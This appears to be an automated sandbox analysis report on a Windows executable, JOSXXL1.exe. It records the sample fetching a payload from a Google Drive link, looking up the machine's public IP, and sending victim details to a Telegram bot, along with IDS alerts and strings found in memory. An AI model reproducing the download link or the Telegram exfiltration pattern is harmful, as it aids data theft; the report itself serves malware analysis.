Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C19DEh	4_2_3A7C1710
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C9E08h	4_2_3A7C9B10
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C4BD7h	4_2_3A7C4908
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C7300h	4_2_3A7C7008
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CE0F8h	4_2_3A7CDE00
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C22C6h	4_2_3A7C1FF8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CB5F0h	4_2_3A7CB2F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C10BEh	4_2_3A7C0DF0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C8AE8h	4_2_3A7C87F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C42B6h	4_2_3A7C3FE8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CF8E0h	4_2_3A7CF5E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CCDD8h	4_2_3A7CCAE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C6347h	4_2_3A7C5FD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CA2D0h	4_2_3A7C9FD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C079Eh	4_2_3A7C04D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C77C8h	4_2_3A7C74D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CE5C0h	4_2_3A7CE2C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CBAB8h	4_2_3A7CB7C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C8FB0h	4_2_3A7C8CB8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CFDA8h	4_2_3A7CFAB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C3076h	4_2_3A7C2DA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CD2A0h	4_2_3A7CCFA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C1E47h	4_2_3A7C1BA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CA798h	4_2_3A7CA4A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C5066h	4_2_3A7C4D98
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C7C90h	4_2_3A7C7998
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CEA88h	4_2_3A7CE790
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C2756h	4_2_3A7C2488
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7CBF80h	4_2_3A7CBC88
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C154Eh	4_2_3A7C1280
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A7C9478h	4_2_3A7C9180
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A801FE8h	4_2_3A801CF0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A801190h	4_2_3A800E98
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A801B20h	4_2_3A801828
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A800338h	4_2_3A800040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A800CC8h	4_2_3A8009D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A800801h	4_2_3A800508
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then jmp 3A801658h	4_2_3A801360
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A843E70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A843E60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A840A03
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_3A840A10

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61886 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61919 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61908 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:61847 -> 142.250.185.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61922 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61902 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61933 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61945 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61913 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61976 -> 188.114.96.3:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:61896 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.coj
Source: JOSXXL1.exe, 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmp, JOSXXL1.exe, 00000000.00000000.1674444309.000000000040A000.00000008.00000001.01000000.00000003.sdmp, JOSXXL1.exe, 00000004.00000000.2315337300.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20a
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003760E000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003763F000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037609000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBkq
Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/a
Source: JOSXXL1.exe, 00000004.00000002.2943553869.00000000089C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2
Source: JOSXXL1.exe, 00000004.00000003.2471464803.0000000007070000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000702F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000702F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/1
Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000701D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download
Source: JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=downloads-
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68
Source: JOSXXL1.exe, 00000004.00000002.2971397294.00000000374C5000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003750B000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.68$
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038573000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000386C9000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038525000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003859A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JOSXXL1.exe, 00000004.00000002.2972706874.00000000386CF000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038500000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000387A7000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038575000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003852B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038573000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000386C9000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038525000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003859A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JOSXXL1.exe, 00000004.00000002.2972706874.00000000386CF000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038500000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000387A7000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038575000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003852B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003763F000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: JOSXXL1.exe, 00000004.00000002.2971397294.000000003763A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBkq

Source: unknown	Network traffic detected: HTTP traffic on port 61902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61922
Source: unknown	Network traffic detected: HTTP traffic on port 61854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61981
Source: unknown	Network traffic detected: HTTP traffic on port 61976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61952
Source: unknown	Network traffic detected: HTTP traffic on port 61964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61913
Source: unknown	Network traffic detected: HTTP traffic on port 61922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61896

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:61847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:61854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61981 version: TLS 1.2

Contains functionality for read data from the clipboard

